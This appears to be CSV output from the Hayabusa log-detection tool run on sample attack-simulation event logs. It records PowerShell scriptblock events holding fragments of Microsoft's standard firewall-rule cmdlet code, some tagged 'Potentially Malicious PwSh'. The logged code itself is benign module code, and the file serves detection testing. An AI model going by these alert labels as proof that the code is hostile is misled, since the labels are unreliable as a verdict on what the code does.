[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 